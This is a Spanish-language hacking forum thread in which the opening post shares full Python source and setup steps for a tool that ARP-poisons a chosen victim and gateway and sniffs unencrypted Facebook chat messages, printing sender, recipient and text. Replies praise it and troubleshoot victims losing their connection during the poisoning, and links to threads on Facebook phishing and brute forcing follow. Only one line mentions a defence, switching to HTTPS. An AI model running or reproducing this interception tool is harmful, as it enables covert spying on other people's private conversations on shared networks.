comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Espiar conversaciones de Facebook

  • 10 Respuestas
  • 7256 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado [Z]tuX

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 18, 2011, 11:14:30 pm »
Hola amigos...

Hoy les dejo esta herramienta, que lo que hace es espiar conversaciones de Facebook... En concreto esta tool es un sniffer...
El código esta escrito en Python, y bueno para usarlo necesitan tener instalado lo siguiente:

Python 2.x
arpspoof (dsniff suite)
dpkt
pypcap


Para instalar dichas herramientas en Ubuntu lo pueden hacer con el siguiente comando:
Código: [Seleccionar]
sudo apt-get install python-dpkt python-pypcap dsniff
Una vez instalado esta, podran usar dicha herramienta!!
Este es el source de la tool, y tambien AQUI:

Código: [Seleccionar]
#!/usr/bin/env python
#-*-encoding:utf8-*-

""" 2011 vdo.pure at gmail.com"""

''' Traducido por ZtuX... secret.user8[at]gmail[dot].com'''

"""

     Este programa es software libre: Usted puede redistribuirlo y / o modificar
     bajo los términos de la licencia GNU General Public License publicada por
     la Free Software Foundation, bien de la versión 3 de la Licencia, o
     (a su elección) cualquier versión posterior.

     Este programa se distribuye con la esperanza de que sea útil,
     pero SIN NINGUNA GARANTÍA, incluso sin la garantía implícita de
     COMERCIALIZACIÓN o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la
     Licencia Pública General GNU para más detalles.

     Usted debería haber recibido una copia de la Licencia Pública General GNU
     junto con este programa. Si no, vaya a http://www.gnu.org/licenses/>.
"""
import sys, os
import dpkt, pcap

def check_root():
    """ Devuelve Verdadero (True) si el usuario es root, de lo contrario Falso (False) """
    if os.getenv('LOGNAME','none').lower() == 'root':
        return True
    return False

def poison(iface,victim, gw):
  """ IP Forwarding """
  os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
  """ ARP cache poisoning, silent, in both directions """
  os.system("arpspoof -i "+iface+" -t "+victim+" "+gw+" 2> /dev/null &")
  os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
  print("Envenenamiento de Cache ARP...")


def fbchatgrep(p,pid):
    data = str(p.data)
    if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
      msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")] 
      if (pid != msgid ): #Comprobar si el mensaje apareció antes (ARP poison clones)
        pid = msgid
        print(" ")
        s = "Mensaje de: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
        print(unicode(s,'unicode_escape').encode('utf-8'))
        s = "Para: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
        print(unicode(s,'unicode_escape').encode('utf-8'))
        s = data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
        print(unicode(s,'unicode_escape').encode('utf-8'))
        print(" ")
    return pid
       
if __name__ == '__main__':
  if len(sys.argv) < 4:
    print '''Traducido por ZtuX... Visita http://mundohacking.com
Para usar siga esta Sintaxis: ./sniff.py <Intefaz> <Victima> <Gateway>
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254'''
    sys.exit(0)
  if not check_root():
    print 'Debes ser SuperUsuario'
    sys.exit(1)

  pid="fo bar"
  pc = pcap.pcap(sys.argv[1])
  pc.setfilter('tcp and port 80') #Sniff only http

  try:
    print 'Escuchando en: %s' % (pc.name)
    print 'Para Salir teclea: Control+C'
    poison(sys.argv[1],sys.argv[2],sys.argv[3])
    for ts, pkt in pc:
      packet = dpkt.ethernet.Ethernet(pkt)
      pid = fbchatgrep(packet,pid)

  except KeyboardInterrupt:
    os.system("sysctl -w .net.ipv4.ip_forward=0 > /dev/null") # Deshabilitar IP Delantera
    nrecv, ndrop, nifdrop = pc.stats()
    print '\n%d packets received by filter' % nrecv
    print '%d packets dropped by kernel' % ndrop

Y bueno, ahora ¿Como usarlo?

Bien primero copiamos nuestro código en un Editor de Textos como Gedit [por ejemplo] y lo guardamos con la extension .py[IMPORTANTE LA EXTENSION .PY], con el nombre sniff... Preferentemente guardarlo en el Escritorio, y nos quedara como sniff.py
Despues tendremos que darle permisos de Ejecucion y lo hacemos de la sig. manera:
Abrimos una Terminal y nos vamos al lugar donde guardamos nuestro archivo... y tecleamos:

Código: [Seleccionar]
chmod +x sniff.py

Como podran notar, en la imagen el nombre del archivo cambio de color, esto porque ahora tiene permisos de ejecucion...

Y bien para hacerlo funcionar, solo basta escribir en una terminal:
Código: [Seleccionar]
./sniff.py
Y nos devuelve algo como:

Código: [Seleccionar]
./sniff.py
Traducido por ZtuX... Visita http://mundohacking.com
Para usar siga esta Sintaxis: ./sniff.py <Intefaz> <Victima> <Gateway>
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254

Y para usarlo ahi tienen la sintaxis y un ejemplo...
Si asi es YO lo traducí jaja xD LOL!!

Bueno eso es todo, alguna duda?? por MP

SaludOS

Por cierto se me olvidaba la página oficial de donde obtuve el source esta Aqui

Y ¿Como evitar este ataque?
Simple, ahora Facebook nos permite cifrar nuesta navegacion, para ello hay que ir a las opciones de nuestra cuenta y elegir la navegacion a travez de https

by ZtuX
Source: http://z0kw3r-syst3m.blogspot.com/2011/05/espiar-conversaciones-de-facebook.html
« Última modificación: Junio 07, 2011, 01:12:51 am por ZtuX »

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« Respuesta #1 en: Mayo 18, 2011, 11:23:09 pm »
Muchas gracias por esto :P Esta bueno aunque podes hacer una session hijacking y es maso menos lo mismo pero no obstante esta genial. Gracias por el aporte.

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #2 en: Mayo 19, 2011, 09:07:35 pm »
orale, muy bueno man, gracias por el aporte
salu2




"Mess with the best, die like the rest"

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #3 en: Mayo 22, 2011, 01:19:45 am »
Muy bueno el code pero por que la victima pierde la conexion cuando se ase el arp poisoning?  :-\ eso ya me avia pasado anteriormente cuando estaba metiendome en el tema del sniffing y bueno asi lo deje pero aora que e probado este code paso lo mismo por que es?  :-\

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #4 en: Mayo 22, 2011, 02:18:10 am »
Muy bueno el code pero por que la victima pierde la conexion cuando se ase el arp poisoning?  :-\ eso ya me avia pasado anteriormente cuando estaba metiendome en el tema del sniffing y bueno asi lo deje pero aora que e probado este code paso lo mismo por que es?  :-\

Bueno, te voy a decir que yo tengo el mismo problema a veces, lo que pasa es de que a a veces pasa esto, debido a que cuando haces el arp poisoning redireccionas la ip de la victima hacia la maquina atacante, y no hacia el gateway como deberia ser para que tenga salida a internet, por lo que a veces pasa esto, esa es mi respuesta con relacion a mis conocimientos, espero haberte ayudado
salu2




"Mess with the best, die like the rest"

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #5 en: Mayo 22, 2011, 10:17:32 am »
si lo se, se tiene que direccionar el trafico de la victima al atacante y de ay a el router y viceversa para que tenga conexion la victima por eso es el IP FORWARD pero aun activando el forward pasa esto  :-\

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #6 en: Mayo 22, 2011, 11:25:25 am »
mmm, que tipo de herramienta usas ? para hacer este tipo de ataques y sobre que plataforma, porque yo tengo el mismo problema a veces con ettercap bajo gnu/linux
salu2




"Mess with the best, die like the rest"

Desconectado Poseidon

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
  • Emperador de los 7 Mares
    • Ver Perfil
« Respuesta #7 en: Mayo 23, 2011, 03:28:39 am »
Muchas gracias vamos a ver si me resulta suena interesante



EMPERADOR DE LOS 7 MARES

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #8 en: Mayo 23, 2011, 02:38:28 pm »
mmm, que tipo de herramienta usas ? para hacer este tipo de ataques y sobre que plataforma, porque yo tengo el mismo problema a veces con ettercap bajo gnu/linux
salu2

exactamente = ettercap en ubuntu  :-\

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #9 en: Mayo 23, 2011, 06:31:04 pm »
mmm, que tipo de herramienta usas ? para hacer este tipo de ataques y sobre que plataforma, porque yo tengo el mismo problema a veces con ettercap bajo gnu/linux
salu2

exactamente = ettercap en ubuntu  :-\

mmm, bueno, a mi me pasa lo mismo a veces, y cuando me pasa esto, lo unico que me queda es reiniciar la maquina victima para testear otra vez en mi laboratorio de mi casa, en caso de hacer un ataque real, no me paso hasta ahora, pero bueno, habria la forma de solucionar esto
salu2




"Mess with the best, die like the rest"

Desconectado bt.slax

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #10 en: Mayo 31, 2011, 11:25:13 am »
Gracias por el tutorial 8)

 

¿Te gustó el post? COMPARTILO!



SocialBox FrameWork BruteForce [Facebook, Gmail, Instragram,Twitter]

Iniciado por R3v0lve

Respuestas: 13
Vistas: 2008
Último mensaje Noviembre 16, 2018, 10:16:45 am
por DtxdF
Hackear facebook metodo pishing semi avanzado.

Iniciado por señorrobot

Respuestas: 2
Vistas: 1826
Último mensaje Julio 07, 2018, 12:40:50 am
por señorrobot
Ingenieria social aplicada al facebook by elshotta

Iniciado por elshotta

Respuestas: 2
Vistas: 2869
Último mensaje Junio 08, 2016, 07:44:33 am
por catami61
Obtener cuenta de Facebook con Enlace Fake

Iniciado por Stiuvert

Respuestas: 4
Vistas: 6375
Último mensaje Junio 15, 2012, 08:16:49 pm
por Stuxnet
fbpwn: ingeniería social en Facebook (Multiplaforma)

Iniciado por Aryenal.Bt

Respuestas: 5
Vistas: 3747
Último mensaje Septiembre 26, 2012, 11:51:09 pm
por elshotta